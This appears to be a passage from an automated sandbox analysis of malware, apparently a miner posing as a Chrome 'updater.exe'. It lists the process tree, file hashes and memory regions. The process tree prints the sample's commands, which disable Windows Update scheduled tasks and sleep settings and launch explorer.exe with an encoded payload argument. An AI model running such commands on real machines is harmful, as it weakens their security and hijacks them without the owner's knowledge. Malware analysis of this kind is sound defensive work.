C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "bmkeytcye"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr564⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
memory/268-108-0x0000000000000000-mapping.dmp
-
memory/292-80-0x0000000000000000-mapping.dmp
-
memory/304-102-0x0000000000000000-mapping.dmp
-
memory/320-145-0x0000000000000000-mapping.dmp
-
memory/320-81-0x0000000000000000-mapping.dmp
-
memory/456-100-0x0000000000000000-mapping.dmp
-
memory/532-83-0x0000000000000000-mapping.dmp
-
memory/628-61-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmpFilesize
8KB
-
memory/628-124-0x0000000000000000-mapping.dmp
-
memory/628-60-0x000000001BAA0000-0x000000001BEBE000-memory.dmpFilesize
4.1MB
-
memory/628-59-0x00000000001C0000-0x00000000005DE000-memory.dmpFilesize
4.1MB
-
memory/636-77-0x0000000000000000-mapping.dmp
-
memory/692-139-0x0000000000000000-mapping.dmp
-
memory/700-120-0x0000000000000000-mapping.dmp
-
memory/780-76-0x0000000000000000-mapping.dmp
-
memory/780-140-0x0000000000000000-mapping.dmp
-
memory/828-146-0x0000000000000000-mapping.dmp
-
memory/828-82-0x0000000000000000-mapping.dmp
-
memory/872-58-0x0000000077A40000-0x0000000077BE9000-memory.dmpFilesize
1.7MB
-
memory/872-55-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/872-91-0x0000000000000000-mapping.dmp
-
memory/872-56-0x0000000077A40000-0x0000000077BE9000-memory.dmpFilesize
1.7MB
-
memory/872-54-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/872-57-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/908-125-0x0000000000000000-mapping.dmp
-
memory/912-129-0x0000000000000000-mapping.dmp
-
memory/972-113-0x0000000000000000-mapping.dmp
-
memory/992-96-0x0000000001250000-0x0000000001EB6000-memory.dmpFilesize
12.4MB
-
memory/992-166-0x0000000001250000-0x0000000001EB6000-memory.dmpFilesize
12.4MB
-
memory/1048-78-0x0000000000000000-mapping.dmp
-
memory/1060-97-0x0000000000000000-mapping.dmp
-
memory/1068-126-0x0000000000000000-mapping.dmp
-
memory/1068-88-0x0000000000000000-mapping.dmp
-
memory/1108-121-0x0000000000000000-mapping.dmp
-
memory/1168-79-0x0000000000000000-mapping.dmp
-
memory/1200-143-0x0000000000000000-mapping.dmp
-
memory/1208-84-0x0000000000000000-mapping.dmp
-
memory/1232-73-0x0000000000000000-mapping.dmp
-
memory/1368-127-0x0000000000000000-mapping.dmp
-
memory/1380-68-0x0000000002644000-0x0000000002647000-memory.dmpFilesize
12KB
-
memory/1380-69-0x000000000264B000-0x000000000266A000-memory.dmpFilesize
124KB
-
memory/1380-62-0x0000000000000000-mapping.dmp
-
memory/1380-67-0x000000001B730000-0x000000001BA2F000-memory.dmpFilesize
3.0MB
-
memory/1380-66-0x0000000002644000-0x0000000002647000-memory.dmpFilesize
12KB
-
memory/1380-64-0x000007FEEDB90000-0x000007FEEE5B3000-memory.dmpFilesize
10.1MB
-
memory/1380-65-0x000007FEED030000-0x000007FEEDB8D000-memory.dmpFilesize
11.4MB
-
memory/1388-104-0x0000000000000000-mapping.dmp
-
memory/1392-72-0x0000000000000000-mapping.dmp
-
memory/1392-149-0x0000000001170000-0x0000000001176000-memory.dmpFilesize
24KB
-
memory/1396-136-0x0000000000000000-mapping.dmp
-
memory/1400-70-0x0000000000000000-mapping.dmp
-
memory/1404-107-0x0000000000000000-mapping.dmp
-
memory/1412-134-0x0000000000000000-mapping.dmp
-
memory/1428-110-0x0000000000000000-mapping.dmp
-
memory/1428-144-0x0000000000000000-mapping.dmp
-
memory/1468-133-0x0000000000000000-mapping.dmp
-
memory/1484-150-0x0000000000060000-0x0000000000067000-memory.dmpFilesize
28KB
-
memory/1484-152-0x0000000000060000-0x0000000000067000-memory.dmpFilesize
28KB
-
memory/1484-153-0x00000000001D0000-0x00000000001D6000-memory.dmpFilesize
24KB
-
memory/1496-167-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-160-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-172-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-171-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-169-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-175-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-165-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-164-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-162-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-173-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-158-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-156-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-155-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-177-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-178-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1496-179-0x0000000000070000-0x0000000000090000-memory.dmpFilesize
128KB
-
memory/1496-180-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/1504-87-0x0000000000000000-mapping.dmp
-
memory/1504-130-0x0000000000000000-mapping.dmp
-
memory/1540-141-0x0000000000000000-mapping.dmp
-
memory/1540-75-0x0000000000000000-mapping.dmp
-
memory/1588-128-0x0000000000000000-mapping.dmp
-
memory/1608-89-0x0000000000000000-mapping.dmp
-
memory/1640-74-0x0000000000000000-mapping.dmp
-
memory/1652-90-0x0000000000000000-mapping.dmp
-
memory/1684-142-0x0000000000000000-mapping.dmp
-
memory/1700-71-0x0000000000000000-mapping.dmp
-
memory/1712-138-0x0000000000000000-mapping.dmp
-
memory/1712-101-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1712-103-0x0000000077A40000-0x0000000077BE9000-memory.dmpFilesize
1.7MB
-
memory/1712-93-0x0000000000000000-mapping.dmp
-
memory/1712-99-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1712-105-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/1712-106-0x0000000077A40000-0x0000000077BE9000-memory.dmpFilesize
1.7MB
-
memory/1744-95-0x0000000000000000-mapping.dmp
-
memory/1752-123-0x0000000000000000-mapping.dmp
-
memory/1780-137-0x0000000000000000-mapping.dmp
-
memory/1808-147-0x0000000000000000-mapping.dmp
-
memory/1896-148-0x0000000000000000-mapping.dmp
-
memory/1900-86-0x0000000000000000-mapping.dmp
-
memory/1908-119-0x0000000000C4B000-0x0000000000C6A000-memory.dmpFilesize
124KB
-
memory/1908-117-0x0000000000C44000-0x0000000000C47000-memory.dmpFilesize
12KB
-
memory/1908-118-0x0000000000C4B000-0x0000000000C6A000-memory.dmpFilesize
124KB
-
memory/1908-116-0x000007FEEC5E0000-0x000007FEED13D000-memory.dmpFilesize
11.4MB
-
memory/1908-115-0x000007FEED140000-0x000007FEEDB63000-memory.dmpFilesize
10.1MB
-
memory/1908-111-0x0000000000000000-mapping.dmp
-
memory/1944-112-0x0000000000000000-mapping.dmp
-
memory/1988-135-0x0000000000000000-mapping.dmp
-
memory/2016-85-0x0000000000000000-mapping.dmp
-
memory/2028-131-0x0000000000000000-mapping.dmp
-
memory/2044-98-0x0000000000000000-mapping.dmp
-
memory/2044-132-0x0000000000000000-mapping.dmp